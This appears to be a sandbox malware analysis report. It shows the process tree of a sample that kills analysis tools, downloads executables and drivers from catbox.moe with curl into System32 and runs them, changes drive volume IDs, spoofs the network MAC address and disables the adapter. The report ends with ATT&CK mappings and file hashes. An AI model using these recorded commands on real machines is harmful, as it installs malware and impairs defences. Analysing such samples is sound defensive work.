- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3152
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:4868
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:3780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:3600
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    - Launches sc.exe
    PID:4208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:1364
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    - Launches sc.exe
    PID:5096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:1928
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    PID:5048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:3320
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    PID:1472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:4248
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    - Launches sc.exe
    PID:4728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\tlxukw.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
  2⤵
  PID:3960
- - C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\tlxukw.exe" MD5
    3⤵
    PID:2040
- - C:\Windows\system32\find.exe
    find /i /v "md5"
    3⤵
    PID:2496
- - C:\Windows\system32\find.exe
    find /i /v "certutil"
    3⤵
    PID:1812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/gv7xzv.bat --output C:\Windows\System32\Tasks\mac.bat >nul 2>&1
  2⤵
  PID:4584
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/gv7xzv.bat --output C:\Windows\System32\Tasks\mac.bat
    3⤵
    - Drops file in System32 directory
    PID:1248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/sdfbn8.sys --output C:\Windows\System32\Tasks\winxsrcsv64.EXE >nul 2>&1
  2⤵
  PID:376
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/sdfbn8.sys --output C:\Windows\System32\Tasks\winxsrcsv64.EXE
    3⤵
    - Downloads MZ/PE file
    - Drops file in System32 directory
    PID:2896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/n6i5j0.sys --output C:\Windows\System32\Tasks\winxsrcsv64.sys >nul 2>&1
  2⤵
  PID:3496
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/n6i5j0.sys --output C:\Windows\System32\Tasks\winxsrcsv64.sys
    3⤵
    - Downloads MZ/PE file
    - Drops file in System32 directory
    PID:2868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/j7goj8.sys --output C:\Windows\System32\Tasks\iqvw64e.sys >nul 2>&1
  2⤵
  PID:1264
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/j7goj8.sys --output C:\Windows\System32\Tasks\iqvw64e.sys
    3⤵
    - Downloads MZ/PE file
    - Drops file in System32 directory
    PID:4184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/xre5ck --output C:\Windows\System32\Tasks\Volumeid64.exe >nul 2>&1
  2⤵
  PID:2304
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/xre5ck --output C:\Windows\System32\Tasks\Volumeid64.exe
    3⤵
    - Downloads MZ/PE file
    - Drops file in System32 directory
    PID:2580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /IVN >nul 2>&146OO27BK3JK6RWM4
  2⤵
  PID:2936
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /IVN 46OO27BK3JK6RWM4
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:4564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /IV >nul 2>&19TE6WC2CXTF0YVXN
  2⤵
  PID:2756
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /IV 9TE6WC2CXTF0YVXN
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:2612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /IV >nul 2>&1LPHFKMEIX7INHXPL
  2⤵
  PID:4676
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /IV LPHFKMEIX7INHXPL
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:3788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /SM >nul 2>&1UGG9FU5PG2G7LAD7
  2⤵
  PID:1632
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /SM UGG9FU5PG2G7LAD7
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /SP >nul 2>&1X8S6Y24IQ3YDGRWH
  2⤵
  PID:3604
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /SP X8S6Y24IQ3YDGRWH
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:1580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /SV >nul 2>&1Q0BQTI2GEH0GA27D
  2⤵
  PID:1348
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /SV Q0BQTI2GEH0GA27D
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:3812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /SS >nul 2>&1GMMU5VH0XOZ5D3QG
  2⤵
  PID:4036
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /SS GMMU5VH0XOZ5D3QG
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:4416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\System32\Tasks\winxsrcsv64.EXE /SU AUTO >nul 2>&1
  2⤵
  PID:4960
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\System32\Tasks\winxsrcsv64.EXE /SU AUTO
    3⤵
    PID:4764
  - - C:\Windows\System32\Tasks\winxsrcsv64.EXE
      C:\Windows\System32\Tasks\winxsrcsv64.EXE /SU AUTO
      4⤵
      Cerber
      Executes dropped EXE
      PID:3020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /SK >nul 2>&1FXVENWBVDWL1T4GO
  2⤵
  PID:704
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /SK FXVENWBVDWL1T4GO
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:2396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /SF >nul 2>&10CT9XEK0CY52P5W8
  2⤵
  PID:1576
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /SF 0CT9XEK0CY52P5W8
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:4932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /BM >nul 2>&157D2QXBQNSUXWXFA
  2⤵
  PID:1864
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /BM 57D2QXBQNSUXWXFA
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:3052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /BP >nul 2>&1B23PY208EPJR9FOD
  2⤵
  PID:4432
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /BP B23PY208EPJR9FOD
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /BV >nul 2>&19AMPLEW8IRD2BOVN
  2⤵
  PID:2024
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /BV 9AMPLEW8IRD2BOVN
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /BS >nul 2>&1Z6STLC2H4017YQOT
  2⤵
  PID:744
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /BS Z6STLC2H4017YQOT
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:4936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /BT >nul 2>&1VUG9WWBWZPONSUMN
  2⤵
  PID:864
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /BT VUG9WWBWZPONSUMN
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:3036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /BLC >nul 2>&1RGIRHUVXPV01FN2O
  2⤵
  PID:4440
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /BLC RGIRHUVXPV01FN2O
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:1272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /CM >nul 2>&1K76GJIVNKFAPJ2QA
  2⤵
  PID:3332
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /CM K76GJIVNKFAPJ2QA
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:3580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /CV >nul 2>&1J00RV0N2KI9LTDJU
  2⤵
  PID:1460
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /CV J00RV0N2KI9LTDJU
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:3464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /CS >nul 2>&1HJ8UB36R1EJOYEFI
  2⤵
  PID:4704
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /CS HJ8UB36R1EJOYEFI
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:4964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /CA >nul 2>&1LHLCXJZCEEIY3BKH
  2⤵
  PID:4324
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /CA LHLCXJZCEEIY3BKH
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:4328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /CSK >nul 2>&100W93EAYU2OGKMBF
  2⤵
  PID:1892
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /CSK 00W93EAYU2OGKMBF
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:4552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /PSN >nul 2>&1NA7NV9VODG0DRQPA
  2⤵
  PID:640
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /PSN NA7NV9VODG0DRQPA
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:2076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /PAT >nul 2>&1UOBU2XJQMIP0JORC
  2⤵
  PID:3152
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /PAT UOBU2XJQMIP0JORC
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:4856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /PPN >nul 2>&1UE7W2FZTMC8JUM6Y
  2⤵
  PID:468
- - C:\Windows\System32\Tasks\winxsrcsv64.EXE
    C:\Windows\System32\Tasks\winxsrcsv64.EXE /PPN UE7W2FZTMC8JUM6Y
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:4352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe C: VEDH-H9YP >NUL 2>&1
  2⤵
  PID:4832
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe C: VEDH-H9YP
    3⤵
    - Executes dropped EXE
    PID:2312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe D: VTR5-UEBK >NUL 2>&1
  2⤵
  PID:4300
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe D: VTR5-UEBK
    3⤵
    - Executes dropped EXE
    PID:3080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe E: A6AH-NU94 >NUL 2>&1
  2⤵
  PID:3408
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe E: A6AH-NU94
    3⤵
    - Executes dropped EXE
    PID:2652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe F: XBLE-KCWH >NUL 2>&1
  2⤵
  PID:724
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe F: XBLE-KCWH
    3⤵
    - Executes dropped EXE
    PID:1548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe G: RGUP-Y949 >NUL 2>&1
  2⤵
  PID:3960
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe G: RGUP-Y949
    3⤵
    - Executes dropped EXE
    PID:636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe H: 3YVP-6PEQ >NUL 2>&1
  2⤵
  PID:4756
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe H: 3YVP-6PEQ
    3⤵
    - Executes dropped EXE
    PID:3808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe I: AF79-6MM3 >NUL 2>&1
  2⤵
  PID:2564
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe I: AF79-6MM3
    3⤵
    - Executes dropped EXE
    PID:4436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe J: VRUR-CUJ0 >NUL 2>&1
  2⤵
  PID:3648
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe J: VRUR-CUJ0
    3⤵
    - Executes dropped EXE
    PID:4296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe K: B9Y2-9Q1W >NUL 2>&1
  2⤵
  PID:4776
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe K: B9Y2-9Q1W
    3⤵
    - Executes dropped EXE
    PID:4980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe L: EEMM-Q51G >NUL 2>&1
  2⤵
  PID:2464
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe L: EEMM-Q51G
    3⤵
    - Executes dropped EXE
    PID:1372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe M: Q40R-973K >NUL 2>&1
  2⤵
  PID:4604
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe M: Q40R-973K
    3⤵
    - Executes dropped EXE
    PID:3880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe N: SEU3-WO9R >NUL 2>&1
  2⤵
  PID:3848
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe N: SEU3-WO9R
    3⤵
    - Executes dropped EXE
    PID:2408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe O: 5JH4-VCZD >NUL 2>&1
  2⤵
  PID:4492
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe O: 5JH4-VCZD
    3⤵
    - Executes dropped EXE
    PID:312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe P: PJLP-04P1 >NUL 2>&1
  2⤵
  PID:1216
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe P: PJLP-04P1
    3⤵
    - Executes dropped EXE
    PID:4488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe Q: PR7I-O8QO >NUL 2>&1
  2⤵
  PID:3628
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe Q: PR7I-O8QO
    3⤵
    - Executes dropped EXE
    PID:3800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe R: 9SF0-KGCY >NUL 2>&1
  2⤵
  PID:3852
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe R: 9SF0-KGCY
    3⤵
    - Executes dropped EXE
    PID:3496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe S: LO8D-CVQI >NUL 2>&1
  2⤵
  PID:4400
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe S: LO8D-CVQI
    3⤵
    - Executes dropped EXE
    PID:4600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe T: NRXF-4HPX >NUL 2>&1
  2⤵
  PID:1808
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe T: NRXF-4HPX
    3⤵
    - Executes dropped EXE
    PID:1760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe U: NVJ3-ARZU >NUL 2>&1
  2⤵
  PID:908
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe U: NVJ3-ARZU
    3⤵
    - Executes dropped EXE
    PID:2656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe V: K8LR-PFHN >NUL 2>&1
  2⤵
  PID:2028
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe V: K8LR-PFHN
    3⤵
    - Executes dropped EXE
    PID:2928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe W: X39Y-JA7D >NUL 2>&1
  2⤵
  PID:2540
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe W: X39Y-JA7D
    3⤵
    - Executes dropped EXE
    PID:4532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe X: D1YY-RC0G >NUL 2>&1
  2⤵
  PID:4180
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe X: D1YY-RC0G
    3⤵
    - Executes dropped EXE
    PID:1220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe Y: 2WFZ-UMMT >NUL 2>&1
  2⤵
  PID:2480
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe Y: 2WFZ-UMMT
    3⤵
    - Executes dropped EXE
    PID:2508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe Z: 93R2-0CY4 >NUL 2>&1
  2⤵
  PID:3788
- - C:\Windows\System32\Tasks\Volumeid64.exe
    C:\Windows\System32\Tasks\Volumeid64.exe Z: 93R2-0CY4
    3⤵
    - Executes dropped EXE
    PID:4676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\mac.bat >nul 2>&1
  2⤵
  PID:380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic nic where physicaladapter=true get deviceid | findstr [0-9]
    3⤵
    PID:1632
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic nic where physicaladapter=true get deviceid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4496
  - - C:\Windows\system32\findstr.exe
      findstr [0-9]
      4⤵
      PID:2072
- - C:\Windows\system32\reg.exe
    REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\01"
    3⤵
    PID:1136
- - C:\Windows\system32\reg.exe
    REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\001"
    3⤵
    PID:4416
- - C:\Windows\system32\reg.exe
    REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001"
    3⤵
    PID:4036
- - C:\Windows\system32\reg.exe
    REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001" /v NetworkAddress /t REG_SZ /d 02-929ACA9A9A9 /f
    3⤵
    PID:3020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic nic where physicaladapter=true get deviceid | findstr [0-9]
    3⤵
    PID:4764
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic nic where physicaladapter=true get deviceid
      4⤵
      PID:2892
  - - C:\Windows\system32\findstr.exe
      findstr [0-9]
      4⤵
      PID:5016
- - C:\Windows\system32\reg.exe
    REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\01"
    3⤵
    PID:4932
- - C:\Windows\system32\reg.exe
    REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\001"
    3⤵
    PID:1576
- - C:\Windows\system32\reg.exe
    REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001"
    3⤵
    PID:3052
- - C:\Windows\system32\reg.exe
    REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001" /v PnPCapabilities /t REG_DWORD /d 24 /f
    3⤵
    PID:1864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic nic where (netconnectionid like '%') get netconnectionid,netconnectionstatus /format:csv"
    3⤵
    PID:316
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic nic where (netconnectionid like '%') get netconnectionid,netconnectionstatus /format:csv
      4⤵
      PID:4432
- - C:\Windows\system32\netsh.exe
    netsh interface set interface name="Ethernet" disable
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:1660

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
1⤵
PID:3940

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\System32\Tasks\Volumeid64.exe

Filesize
165KB

MD5
81a45f1a91448313b76d2e6d5308aa7a

SHA1
0d615343d5de03da03bce52e11b233093b404083

SHA256
fb0d02ea26bb1e5df5a07147931caf1ae3d7d1d9b4d83f168b678e7f3a1c0ecd

SHA512
675662f84dfcbf33311f5830db70bff50b6e8a34a4a926de6369c446ea2b1cf8a63e9c94e5a5c2e1d226248f0361a1698448f82118ac4de5a92b64d8fdf8815d

Download Submit
C:\Windows\System32\Tasks\mac.bat

Filesize
2KB

MD5
189dbc488495dbb7b4bc313bbf777116

SHA1
476e49b7383544e7f1e5d4c080e528fd406906d1

SHA256
6b564fd712451bab4446c4beca68635843dfbbeb38a3430b162098e9204ce40b

SHA512
ae6464807f10f4b0ca869c253b7036ae5e7f14b24e8079f8a3481816e4457e036747fdfbbfa26c9f85795f7dcb57f1e839811a327f326799bdc5b5820106c38e

Download Submit
C:\Windows\System32\Tasks\winxsrcsv64.EXE

Filesize
379KB

MD5
91a31f23f3e50bd0a722e605687aed1e

SHA1
f56fa26aaccdd6eb3f1ea53f06674b01327cd7c4

SHA256
818d6d87d0facc03354bf7b0748467cf61040031248ba8b46045ed9dbe4053d8

SHA512
649ee112c0e9d0c63c199f0dee84332f915af336dd7ad0ff70cbd49cc148c832182ff748c67fe1dee958215ea4a095545d1a93fdeb90fbdeb6f98076b499aab0

Download Submit